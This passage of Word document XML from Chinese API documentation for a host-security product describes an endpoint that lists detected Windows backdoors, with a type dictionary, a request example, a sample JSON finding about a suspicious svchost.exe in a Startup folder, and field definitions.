          <w:p w14:paraId="7C17791A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B8DE01E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>可疑启动项</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5DBFC3E6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="148FF93B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72590FCB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>映像劫持</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6D5328ED" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20CB30CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E1B6DE1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>恶意进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A560449" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EF257C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/external/api/detect/backdoor/win?page=0&amp;size=50&amp;group=1,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317DCC08" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42091B69" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "b6f30c43688e4798",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp": "192.168.199.191",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp": "192.168.199.191",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp": "192.168.199.191",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup": "未分组主机（Windows）",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "ADMIN-PC",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "createTime": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "backDoorTypeId": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "name": "进程svchost.exe加载异常网络模块",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "reason": "进程svchost.exe存在被动态加载的网络模块，如果不是正常的挂载，那么极有可能被窃取信息",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "data": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "item": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "parent_process_id": 1712,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "b_wow64": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    "process_id": 1480,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "b_64bit": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "create_time": 1512045079,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "process_name": "svchost.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "parent_process_name": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "image_file_name": "C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svchost.exe"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "ret_msg": "dynamic load network module process",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "ret_code": "0x00000005"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "whiteRuleEffect": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726D5013"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767"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="4090"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5DECE7A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6A5ED4C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="068D7B51" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CC08BD1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01C0D661" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="584E406F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6480F100" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41AA8855" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="463CFDF8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CE7EBCF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机ID，16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="54EF1945" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D0AD32A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3353E13A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33F44849" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D85E6AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3BF95B23" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73A93C29" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E75F7C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EAEF23E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28901EC6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0AA16128" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="682A12F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3125C7D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="116FB170" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04F6C99E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="653A220E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C18FC31" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="158FDAA4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AC37C5A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48865A11" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7D7B7E56" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="023951CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C03C95C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6850CED9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F1C587C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="41CCC6D1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05AA9BA9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D2263F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B61855F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57465F8F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4F002FF8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67F41FE8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B78FB46" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B4C66CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D108D0F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6E6EC85C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="553D2DC9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2712590E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05EF2A2F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4331F41D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="35405C94" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B096ABB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>createTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="235064C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E36B56D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73DB0AF5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>发现时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3E2A75F9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="012C721C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21225592" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D397AC3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61275D12" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>问题摘要</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2FF1EC1C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DFCA3A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorTypeId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="601F2179" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2553F6B3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="212BFF68" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>后门类型，见</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>《Windows后门类型字典表》</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1E2A0A30" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EFBB1E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>reason</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48E4F2EA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1247C890" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66E5EFB6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>异常原因，恶意进程中为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1BF8D2E5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DD58A96" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14326A58" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D26813E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7939081A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>详情，见</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>《附录2》</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="39236281" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
